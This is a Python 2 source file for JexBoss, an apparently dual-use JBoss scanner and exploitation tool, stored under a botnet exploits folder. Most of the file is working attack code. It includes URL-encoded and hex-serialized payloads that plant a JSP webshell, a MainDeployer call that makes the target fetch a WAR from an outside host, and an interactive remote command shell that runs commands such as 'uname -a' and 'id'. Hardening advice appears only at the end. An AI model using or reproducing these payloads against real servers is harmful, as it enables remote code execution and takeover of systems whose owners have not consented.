Path: blob/master/Botnets/Exploits/JBOSS FULL/jexboss_vulnscanner.py
5038 views
# coding: utf-812# JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])34# Updates: https://github.com/joaomatosf/jexboss56# Free for distribution and modification, but the authorship should be preserved.789101112import httplib, sys, urllib, os, time1314from urllib import urlencode15161718RED = '\x1b[91m'1920RED1 = '\033[31m'2122BLUE = '\033[94m'2324GREEN = '\033[32m'2526BOLD = '\033[1m'2728NORMAL = '\033[0m'2930ENDC = '\033[0m'31323334def getHost(url):3536tokens = url.split("://")3738if len(tokens) == 2: #foi fornecido protocolo3940return tokens[1].split(":")[0]4142else:4344return tokens.split(":")[0]45464748def getProtocol(url):4950tokens = url.split("://")5152if tokens[0] == "https":5354return "https"5556else:5758return "http"59606162def getPort(url):6364token = url[6:].split(":")6566if len(token) == 2:6768return token[1]6970elif getProtocol(url) == "https":7172return 4437374else:7576return 8077787980def getConnection(url):8182if getProtocol(url) == "https":8384return httplib.HTTPSConnection(getHost(url), getPort(url))8586else:8788return httplib.HTTPConnection(getHost(url), getPort(url))899091929394def getSuccessfully(url, path):9596result = 4049798time.sleep(5)99100conn = getConnection(url)101102conn.request("GET", path)103104result = conn.getresponse().status105106if result == 404:107108conn.close()109110time.sleep(7)111112conn = getConnection(url)113114conn.request("GET", path)115116result = conn.getresponse().status117118conn.close()119120return result121122123124def checkVul(url):125126127128print ( GREEN +" ** Checking Host: %s **\n" %url )129130131132path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",133134"web-console" : "/web-console/ServerInfo.jsp",135136"JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}137138139140for i in path.keys():141142try:143144print GREEN + " * Checking %s: \t" %i + ENDC,145146conn = getConnection(url)147148conn.request("HEAD", path[i])149150path[i] = conn.getresponse().status151152if path[i] == 200 or path[i] == 500:153154print RED + "[ VULNERABLE ]" + ENDC155156else: print GREEN + "[ OK ]"157158conn.close()159160except:161162print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC163164path[i] = 505165166167168return path169170171172def autoExploit(url, type):173174175176# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5177178# exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 6179180# exploitWebConsoleInvoker: tested and working in jboss 4181182# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5183184185186print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)187188result = 505189190if type == "jmx-console":191192result = exploitJmxConsoleFileRepository(url)193194if result != 200 and result != 500:195196result = exploitJmxConsoleMainDeploy(url)197198elif type == "web-console":199200result = exploitWebConsoleInvoker(url)201202elif type == "JMXInvokerServlet":203204result = exploitJMXInvokerFileRepository(url)205206207208if result == 200 or result == 500:209210print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC211212shell_http(url, type)213214else:215216print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n"217218" Waiting for 7 seconds...\n "+ ENDC)219220time.sleep(7)221222223224def shell_http(url, type):225226if type == "jmx-console" or type == "web-console":227228path = '/jbossass/jbossass.jsp?'229230elif type == "JMXInvokerServlet":231232path = '/shellinvoker/shellinvoker.jsp?'233234235236conn = getConnection(url)237238conn.request("GET", path)239240conn.close()241242time.sleep(7)243244resp = ""245246#clear()247248print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"249250print RED+" * "+url+": \n"+ENDC251252headers = {"User-Agent" : "jexboss"}253254for cmd in ['uname -a', 'cat /etc/issue', 'id']:255256conn = getConnection(url)257258cmd = urlencode({"ppp": cmd})259260conn.request("GET", path+cmd, '', headers)261262resp += " "+conn.getresponse().read().split(">")[1]263264print resp,265266267268while 1:269270print BLUE + "[Type commands or \"exit\" to finish]"271272cmd=raw_input("Shell> "+ENDC)273274#print ENDC275276if cmd == "exit":277278break279280conn = getConnection(url)281282cmd = urlencode({"ppp": cmd})283284conn.request("GET", path+cmd, '', headers)285286resp = conn.getresponse()287288if resp.status == 404:289290print RED+ " * Error contacting the commando shell. Try again later..."291292conn.close()293294continue295296stdout = ""297298try:299300stdout = resp.read().split("pre>")[1]301302except:303304print RED+ " * Error contacting the commando shell. Try again later..."305306if stdout.count("An exception occurred processing JSP page") == 1:307308print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC309310else: print stdout,311312conn.close()313314315316def exploitJmxConsoleMainDeploy(url):317318# MainDeployer319320# does not work in jboss5 (bug in jboss5)321322# shell in link323324# /jmx-console/HtmlAdaptor325326jsp = "http://www.joaomatosf.com/rnp/jbossass.war"327328payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"329330"=MainDeployer&methodIndex=19&arg0="+jsp)331332print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "333334"\n available on: "+jsp +ENDC)335336conn = getConnection(url)337338conn.request("HEAD", payload)339340result = conn.getresponse().status341342conn.close()343344return getSuccessfully(url, "/jbossass/jbossass.jsp")345346347348def exploitJmxConsoleFileRepository(url):349350# DeploymentFileRepository351352# tested and work in jboss4, 5.353354# doest not work in jboss6355356# shell jsp357358# /jmx-console/HtmlAdaptor359360jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"361362"%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"363364"%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"365366"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"367368"%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"369370"%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"371372"%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"373374"%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"375376"%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"377378"%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"379380"%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"381382"%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"383384"%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"385386"%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"387388"%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"389390"%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"391392"%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"393394"%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )395396397398payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="399400"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="401402"jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"403404"ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")405406407408conn = getConnection(url)409410conn.request("HEAD", payload)411412result = conn.getresponse().status413414conn.close()415416return getSuccessfully(url, "/jbossass/jbossass.jsp")417418419420def exploitJMXInvokerFileRepository(url):421422# tested and work in jboss4, 5423424# MainDeploy, shell in data425426# /invoker/JMXInvokerServlet427428payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"429430"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"431432"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"433434"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"435436"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"437438"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"439440"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"441442"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"443444"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"445446"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"447448"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"449450"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"451452"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"453454"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"455456"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"457458"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"459460"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"461462"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"463464"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"465466"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"467468"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"469470"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"471472"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"473474"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"475476"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"477478"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"479480"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"481482"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"483484"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"485486"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"487488"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"489490"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"491492"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"493494"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"495496"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"497498"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"499500"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"501502"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"503504"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"505506"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"507508"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"509510"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"511512"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"513514"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"515516"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"517518"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"519520"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"521522"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"523524"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"525526"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"527528"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"529530"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"531532"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"533534"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"535536"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"537538"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"539540"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"541542"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"543544"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"545546"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"547548"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"549550"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"551552"\x00\x04\x70\x78")553554conn = getConnection(url)555556headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",557558"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}559560conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)561562response = conn.getresponse()563564result = response.status565566if result == 401:567568print " Retrying..."569570conn.close()571572conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)573574response = conn.getresponse()575576result = response.status577578if response.read().count("Failed") > 0:579580result = 505581582conn.close583584return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")585586587588def exploitWebConsoleInvoker(url):589590# does not work in jboss5 (bug in jboss5)591592# MainDeploy, shell in link593594# /web-console/Invoker595596#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"597598#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)599600#jsp = "\\x" + jsp601602payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"603604"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"605606"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"607608"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"609610"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"611612"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"613614"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"615616"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"617618"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"619620"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"621622"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"623624"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"625626"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"627628"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"629630"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"631632"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"633634"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"635636"\x2a"637638#link639640"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"641642"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"643644"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"645646#end647648"\x75\x72\x00\x13\x5b"649650"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"651652"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"653654"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"655656"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"657658"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"659660"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"661662"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"663664"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"665666"\x70\x6c\x6f\x79\x65\x72\x78")667668conn = getConnection(url)669670headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",671672"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}673674conn.request("POST", "/web-console/Invoker", payload, headers)675676response = conn.getresponse()677678result = response.status679680if result == 401:681682print " Retrying..."683684conn.close()685686conn.request("HEAD", "/web-console/Invoker", payload, headers)687688response = conn.getresponse()689690result = response.status691692conn.close693694return getSuccessfully(url, "/jbossass/jbossass.jsp")695696697698699700def clear():701702if os.name == 'posix':703704os.system('clear')705706elif os.name == ('ce', 'nt', 'dos'):707708os.system('cls')709710711712def checkArgs(args):713714if len(args) < 2 or args[1].count('.') < 1:715716return 1,"You must provide the host name or IP address you want to test."717718elif len(args[1].split('://')) == 1:719720return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])721722elif args[1].count('http') == 1 and args[1].count('.') > 1:723724return 0, ""725726else:727728return 1, 'Parâmetro inválido'729730731732def banner():733734clear()735736print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"737738" | |\n"739740" | @author: João Filho Matos Figueiredo |\n"741742" | @contact: [email protected] |\n"743744" | |\n"745746" | @update: https://github.com/joaomatosf/jexboss |\n"747748" #______________________________________________________#\n\n" )749750751752banner()753754# check python version755756if sys.version_info[0] == 3:757758print (RED + "\n * Not compatible with version 3 of python.\n"759760" Please run it with version 2.7 or lower.\n\n"761762+BLUE+" * Example:\n"763764" python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )765766sys.exit(1)767768769770# check Args771772status, message = checkArgs(sys.argv)773774if status == 0:775776url = sys.argv[1]777778elif status == 1:779780print RED + "\n * Error: %s" %message781782print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC783784sys.exit(status)785786elif status == 2:787788url = ''.join(['http://',sys.argv[1]])789790791792# check vulnerabilities793794mapResult = checkVul(url)795796797798# performs exploitation799800for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:801802if mapResult[i] == 200 or mapResult[i] == 500:803804print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"805806" This operation will provide a simple command shell to execute commands on the server..\n"807808+RED+" Continue only if you have permission!" +ENDC)809810if raw_input(" yes/NO ? ").lower() == "yes":811812autoExploit(url, i)813814815816# resume results817818if mapResult.values().count(200) > 0:819820banner()821822print RED+ " Results: potentially compromised server!" +ENDC823824print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"825826" Recommendations: \n"827828" - Remove web consoles and services that are not used, eg:\n"829830" $ rm web-console.war\n"831832" $ rm http-invoker.sar\n"833834" $ rm jmx-console.war\n"835836" $ rm jmx-invoker-adaptor-server.sar\n"837838" $ rm admin-console.war\n"839840" - Use a reverse proxy (eg. nginx, apache, f5)\n"841842" - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"843844" - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"845846" References:\n"847848" [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"849850" [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"851852"\n"853854" - If possible, discard this server!\n\n"855856" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )857858elif mapResult.values().count(505) == 0:859860print ( GREEN+ "\n\n * Results: \n"861862" The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)863864865866# infos867868print (ENDC+" * Info: review, suggestions, updates, etc: \n"869870" https://github.com/joaomatosf/jexboss\n"871872" [email protected]\n")873874875876print ENDC877878